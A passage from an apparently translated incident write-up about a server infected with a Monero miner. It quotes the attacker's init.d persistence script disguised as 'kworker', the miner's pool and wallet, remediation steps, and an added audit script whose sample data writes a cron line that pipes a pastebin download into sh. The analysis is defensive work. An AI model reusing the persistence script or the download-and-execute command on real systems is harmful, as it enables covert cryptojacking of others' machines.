#processname: /usr/sbin/kworker
### BEGIN INIT INFO
# Provides:	/user/sbin/kworker
# Required-Start:
# Required-Stop:
# Default-Start:	2 3 4 5
# Default-Stop:		0 1 6
# Short-Description: kworker deamon
# Description:		kworker deamon
### END INIT INFO

LocalPath="/usr/sbin/kworker"
name='kworker'
pid_file="/var/run/$name.pid"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
    cat "$pid_file"
}
is_running(){
    [ -f "$pid_file" ] &&/usr/sbin/kworker -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
    if is_running; then
        echo "Already started"
    else
        echo "Starting $name"
        $LocalPath >>"$stdout_log" 2>> "$stderr_log" &
        echo $! > "$pid_file"
        if ! is_running; then
        echo "Unable to start, see$stdout_log and $stderr_log"
        exit 1
        fi
    fi
;;
stop)
    if is_running; then
        echo -n "Stopping$name.."
        kill $(get_pid)
        for i in {1..10}
        do
            if ! is_running; then
                break
            fi
            echo -n "."
            sleep 1
        done
        echo
        if is_running; then
            echo "Not stopped; maystill be shutting down or shutdown may have failed"
            exit 1
        else
            echo "Stopped"
            if [ -f "$pid_file"]; then
                rm "$pid_file"
            fi
        fi
    else
        echo "Not running"
    fi
;;
restart)
    $0 stop
    if is_running; then
        echo "Unable to stop, will notattempt to start"
        exit 1
    fi
    $0 start
;;
status)
    if is_running; then
        echo "Running"
    else
        echo "Stopped"
        exit 1
    fi
;;
*)
echo "Usage: $0{start|stop|restart|status}"
exit 1
;;
esac
exit 0

  With the functions covered, here is the flow of the script as a whole: downloadrun downloads the executable /tmp/kworkerds and runs it in the background; then init downloads kworker and configures it to start at boot; after that echocron configures cron jobs in three places; sleep 10 waits 10 seconds; and finally downloadrunxm downloads /bin/config.json, downloads the executable /tmp/kworkerds and runs it in the background.

4. Reflections

  I have finally analysed the rough flow of this attacker's program, killed every process it started and removed every file it downloaded. My analysis is that the initial infection was probably caused by somehow triggering this program by accident while installing Redis. Without the Alibaba Cloud alerts it might never have been discovered, and it would have kept consuming resources and bandwidth. In future it is better to install software through official channels and to enable key-based login on the server; also, scripts and background programs that are not needed should simply not be installed. Overall, going through a server compromise and reading its code in depth has been quite a learning experience. One regret is that the code and shell scripts are all hosted on third-party services, so I was never able to find the attacker's own address; it may be hidden inside the executables, or be related to "url": "stratum+tcp://xmr.f2pool.com:13531","user":"47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig".

5. Remediation

    1. Find the corresponding processes and kill them.
    2. Check whether the malicious script made use of Python or some other runtime the server does not need, and remove that runtime.
    3. Back up the data, redeploy on a new cloud host, then wipe the infected host.
    4. Keep up to date with software bugs and system vulnerabilities, close interfaces that are not needed, and raise password complexity to prevent infection.
    5. Install some Linux antivirus software.
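As an added example that is not part of the original write-up or of the attacker's scripts: a small POSIX sh audit script for checking a Linux host for the artifacts described above, which supports the first two remediation steps. The dropped-file paths, the three cron files written by echocron and the pool port 13531 are taken from the analysed script; the ld.so.preload check corresponds to the "shared library preload config tampering" alert from the start of the post. The AUDIT_ROOT prefix, the function names and the sample tree built by make_sample_tree for an offline run are all my own constructions.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a Linux host for the
# persistence artifacts the analysed script leaves behind.
# Usage: AUDIT_ROOT=/ sh audit.sh        (live host)
#        AUDIT_ROOT=/mnt/disk sh audit.sh (copied or mounted filesystem)
#        sh audit.sh                      (constructed sample tree, for a dry run)

# Files dropped by downloadrun / downloadrunxm / init (paths from the script).
IOC_FILES="/bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds /usr/sbin/kworker /etc/init.d/kworker"
# Cron files overwritten by echocron.
CRON_FILES="/etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root"
# Shared-library preload config behind the "preload config tampering" alert.
PRELOAD_FILE="/etc/ld.so.preload"
# Mining pool port the script checks with netstat before re-downloading.
POOL_PORT=13531

# find_dropped_files ROOT: print every known dropped path that exists under ROOT.
find_dropped_files() {
    root="$1"
    for f in $IOC_FILES; do
        [ -e "$root$f" ] && echo "dropped file: $f"
    done
    return 0
}

# find_cron_download_exec ROOT: print cron lines (file:line:text) that pipe a
# download straight into a shell, the "curl https://...|sh" pattern from echocron.
find_cron_download_exec() {
    root="$1"
    for c in $CRON_FILES; do
        [ -f "$root$c" ] || continue
        grep -nE '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh' "$root$c" | sed "s|^|$c:|"
    done
    return 0
}

# check_preload ROOT: a non-empty ld.so.preload injects a library into every
# dynamically linked process; print its entries if there are any.
check_preload() {
    root="$1"
    if [ -s "$root$PRELOAD_FILE" ]; then
        echo "preload entries in $PRELOAD_FILE:"
        grep -v '^[[:space:]]*$' "$root$PRELOAD_FILE"
    fi
    return 0
}

# find_pool_connections: filter netstat/ss style lines on stdin down to those
# with an endpoint on the pool port. Feed it "netstat -anp" or "ss -tnp" output.
find_pool_connections() {
    grep -E "[.:]$POOL_PORT([[:space:]]|\$)"
    return 0
}

# audit_root ROOT: run every check; the socket check only makes sense live.
audit_root() {
    root="${1%/}"
    echo "== auditing ${root:-/} =="
    find_dropped_files "$root"
    find_cron_download_exec "$root"
    check_preload "$root"
    if [ -z "$root" ] && command -v ss >/dev/null 2>&1; then
        ss -tnp 2>/dev/null | find_pool_connections
    fi
}

# make_sample_tree: constructed tree mimicking an infected root, for offline runs.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/bin" "$t/usr/sbin" "$t/etc/cron.d" "$t/etc/init.d" "$t/var/spool/cron/crontabs"
    : > "$t/bin/kworkerds"
    : > "$t/usr/sbin/kworker"
    printf '%s\n' '*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh' '##' > "$t/etc/cron.d/root"
    printf '%s\n' '0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf' > "$t/var/spool/cron/crontabs/root"
    printf '%s\n' '/usr/local/lib/libsample.so' > "$t/etc/ld.so.preload"
    echo "$t"
}

audit_root "${AUDIT_ROOT-$(make_sample_tree)}"
```

Run it against the live root first to list what is present, then against the same tree again after cleanup to confirm nothing came back; because echocron re-creates the cron entries every few minutes while the dropper is still running, an empty second run is only meaningful once the kworkerds and kworker processes have been killed.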